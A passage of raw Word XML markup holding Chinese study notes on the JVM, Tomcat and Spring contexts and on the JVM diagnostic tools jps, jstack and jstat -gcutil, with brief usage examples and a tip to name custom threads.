          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">(3) </w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>jvm</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>包含</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>运行环境，</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>加载了应用上下文，应用上下文加载</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>运行环境</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">(4) </w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一个</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的各个项目之间是独立的上下文环境，如果通过</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>访问，也相当于跨</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>jvm</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，不是引用调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851"/>
    <w:p w:rsidR="00634851" w:rsidRPr="00F41A4C" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2.11  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>jvm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>各种性能调优工具</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:hAnsi="simsun" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E7EEF4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE426C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:hAnsi="simsun"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E7EEF4"/>
        </w:rPr>
        <w:t>一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE426C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:hAnsi="simsun"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E7EEF4"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE426C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:hAnsi="simsun"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E7EEF4"/>
        </w:rPr>
        <w:t>的应用程序对应于一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE426C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:hAnsi="simsun"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E7EEF4"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE426C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:hAnsi="simsun"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E7EEF4"/>
        </w:rPr>
        <w:t>实例，当一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE426C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:hAnsi="simsun"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E7EEF4"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE426C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:hAnsi="simsun"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E7EEF4"/>
        </w:rPr>
        <w:t>程序运行的时候，一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE426C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:hAnsi="simsun"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E7EEF4"/>
        </w:rPr>
        <w:t>jvm</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE426C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:hAnsi="simsun"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E7EEF4"/>
        </w:rPr>
        <w:t>实例就诞生了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:hAnsi="simsun" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E7EEF4"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00877296" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:hAnsi="simsun" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E7EEF4"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A46715">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>http://my.oschina.net/feichexia/blog/196575?fromerr=7dnEXx2r</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00F41A4C" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>11.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jps</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00F41A4C" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> jps</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>主要用来输出</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>中运行的进程状态信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00F41A4C" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>jps –l -m</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00F41A4C" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>11.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jstack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00F41A4C" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>jstack</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>主要用来查看某个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>进程内的线程堆栈信息。不仅能够导出线程堆栈</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>还能自动进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>死锁检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>输出线程死锁原因</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00F41A4C" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>jstack</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>可用于导出</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>运用程序的线程堆栈，其基本使用语法为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>jstack [-l] pid</w:t>
      </w:r>
      <w:r w:rsidR="00551692">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">-l </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>选项用于打印锁的额外信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00551692" w:rsidRDefault="00551692" w:rsidP="00634851">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动一个线程最好给线程设置一个名称，因为这样在使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jstack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析程序或者进行问题排查时，就会给开发人员提供一些提示，</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA46EE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>自定义线程最好能够起个名字</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00F41A4C" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>11.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jstat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="008749D6" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">jstat   -gcutil  pid  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>interval</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="000F60D1" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jstat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>显示本地或者远程虚拟机继承中的类装载、内存、垃圾收集、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JIT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>编译等运行数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jstat   -gcutil  2270  10000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="008749D6" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-gcutil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>表示统计</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>情况</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00532927" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
